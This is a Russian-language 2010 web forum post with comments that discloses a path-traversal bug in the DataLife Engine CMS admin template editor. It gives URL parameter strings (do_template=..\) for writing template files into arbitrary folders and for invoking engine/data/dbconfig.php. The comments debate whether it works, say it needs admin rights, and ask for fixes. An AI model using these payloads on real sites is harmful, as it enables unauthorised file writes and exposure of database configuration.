Баг - прямой вызов файлов и мусор в папках

Данный баг позволяет производить прямой запуск файлов и мусорить в папках

DLE уязвимость работает на версиях: ВСЕ DLE

Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)

Нашёл очередной баг: Lion__

Переходим по ссылке:
http://жертва/admin.php?mod=templates

Получаем юрл с хешем, дописываем в ссылку:

Если вам надо расплодить файлы шаблона в нужную папку (например в root):
&action=dosavetemplates&edit_main=Bag_By_Lion__&do_template=..\


Прямой запуск файлов (пример запуска dbconfig.php):
&action=dosavetemplates&do_template=..\engine/data/dbconfig.phP -a=


Внимание: Второй способ не тестировался, но должен работать, защиту вроде обходит
Другие новости по теме:

Категория: Баги ----- Просмотров: 3141 ----- Комментариев: 21

Вернуться

  • DImkA

  • 9 июня 2010 13:43
  • Группа: r00t Admin
  • ICQ: 5160909
  • Регистрация: 12.12.2007
  • Комментариев: 137
  • Публикаций: 74
^
Да и будет только так работать при админе.. сам себе будеш что-ли мусорить??

зы второй не пашет

--------------------
Йа

  • Lion__

  • 9 июня 2010 13:49
  • Группа: Гости
  • ICQ: --
  • Регистрация: --
  • Комментариев: 0
  • Публикаций: 0
^
зы второй не пашет
Тогда пользоваться надо вторым багом тот что новостью выше, там напрямую вызывается
  • Группа: User
  • ICQ: --
  • Регистрация: 25.10.2009
  • Комментариев: 24
  • Публикаций: 3
^
1) не пашет
2) пашет bm
  • Группа: User
  • ICQ: --
  • Регистрация: 26.03.2009
  • Комментариев: 30
  • Публикаций: 1
^
Переходим по ссылке:
http://жертва/admin.php?mod=templates

ну так для того и меняется название admin.php на любое другое в админке. А если ты сам админ, то нафиКК это надо???

  • NoSay

  • 9 июня 2010 19:44
  • Группа: Модератор
  • ICQ: --
  • Регистрация: 12.11.2009
  • Комментариев: 81
  • Публикаций: 10
^
Как исправить?

--------------------
www.spacebattles.ru - Онлайн браузерная космическая стратегия!
  • Группа: User
  • ICQ: --
  • Регистрация: 9.02.2009
  • Комментариев: 64
  • Публикаций: 20
^
первый способ тоже работает)
&action=dosavetemplates&edit_main=Bag_By_Lion__&do_template=..\

где Bag_By_Lion__ это название вашего шаблона

эти все баги не будут работать если не ставить на папку templates права 777

или отключить функцию fopen smile

--------------------
SECURED DLE v.1.0 - спешите узнать
Не наживайте себе врага в виде KZPROMO (C) ZLoy
RU-UA.WS

  • Lion__

  • 9 июня 2010 20:33
  • Группа: Гости
  • ICQ: --
  • Регистрация: --
  • Комментариев: 0
  • Публикаций: 0
^
где Bag_By_Lion__ это название вашего шаблона

Нет, это внутренность шаблона, в данном случае main.tpl

Если отключить fopen То много чего не будет работать)

  • pav

  • 11 июня 2010 01:27
  • Группа: User
  • ICQ: --
  • Регистрация: 19.01.2009
  • Комментариев: 253
  • Публикаций: 9
^
А у меня на сервере даже шеллы бесполезны, вот полюбуйтесь, товарисчи: http://ru-ua.ws/engine.php

  • Lion__

  • 11 июня 2010 01:54
  • Группа: Гости
  • ICQ: --
  • Регистрация: --
  • Комментариев: 0
  • Публикаций: 0
^
BlackSmoke
Да ты крут...

  • pav

  • 11 июня 2010 11:43
  • Группа: User
  • ICQ: --
  • Регистрация: 19.01.2009
  • Комментариев: 253
  • Публикаций: 9
^
А то wink
  • Группа: User
  • ICQ: 973508
  • Регистрация: 12.06.2010
  • Комментариев: 5
  • Публикаций: 0
^
Эта хрень работает только на Денвере. На реальном, нормально настроенном, сервере нет
  • Группа: Гости
  • ICQ: 767792
  • Регистрация: 14.02.2008
  • Комментариев: 414
  • Публикаций: 19
^
fideral,
дай линк на свой сайт, а?

  • wp_

  • 13 июня 2010 03:19
  • Группа: Гости
  • ICQ: --
  • Регистрация: --
  • Комментариев: 0
  • Публикаций: 0
^
Как исправить данный фикс ?

  • Lion__

  • 13 июня 2010 16:52
  • Группа: Гости
  • ICQ: --
  • Регистрация: --
  • Комментариев: 0
  • Публикаций: 0
^
fideral
Она везде реботает, дай злому линк wink

  • pav

  • 13 июня 2010 17:23
  • Группа: User
  • ICQ: --
  • Регистрация: 19.01.2009
  • Комментариев: 253
  • Публикаций: 9
^
Вот полезли-то плодить дыры wink
Я найду много других дел с правами администратора, чем мусорить в папках wink
  • Группа: User
  • ICQ: 973508
  • Регистрация: 12.06.2010
  • Комментариев: 5
  • Публикаций: 0
^
to ZLoY Волосатый Торт
А смысл? Потренироваться во взломе? Админских прав я тебе все равно не дам. К тому же у меня лицуха и дыр на порядок меньше

  • tireks

  • 13 июня 2010 20:17
  • Группа: User
  • ICQ: --
  • Регистрация: 18.08.2009
  • Комментариев: 7
  • Публикаций: 0
^
fideral,
ты дай ему линк, и админские права будет раздавать он boyan
  • Группа: Гости
  • ICQ: 767792
  • Регистрация: 14.02.2008
  • Комментариев: 414
  • Публикаций: 19
^
Цитата: fideral
А смысл? Потренироваться во взломе? Админских прав я тебе все равно не дам. К тому же у меня лицуха и дыр на порядок меньше

ты линк дай, а длее дело за мной :D

  • Lion__

  • 13 июня 2010 21:41
  • Группа: Гости
  • ICQ: --
  • Регистрация: --
  • Комментариев: 0
  • Публикаций: 0
^
fideral,
Оо какой ты умный... Тогда скажи хоть 1 дыру которая есть в нулле, но нет в офф версии?? Или хотя бы скажи чем отличается нулл от лицензии в данном случае, если конечно это знаешь
  • Группа: User
  • ICQ: 973508
  • Регистрация: 12.06.2010
  • Комментариев: 5
  • Публикаций: 0
^
Смешные вы ребята однако. Линк давать не собираюсь ибо не все дыры знаю. Во многих нуллах есть бэкдоры оставленные нуллерами. Сам с ломанного двигла начинал и сейчас есть один сайт для экспериментов.

  • asalex

  • 15 июня 2010 10:06
  • Группа: Гости
  • ICQ: --
  • Регистрация: --
  • Комментариев: 0
  • Публикаций: 0
^
все так начинали ))
На самую главную
На главную

Релизы CMS DLE
Шаблоны для DLE
Модули для DLE
Хаки
Платные DLE шаблоны & модули
Баги
Скрипты для сайта
Вебмастеру
Для фотошопа
Все последние новости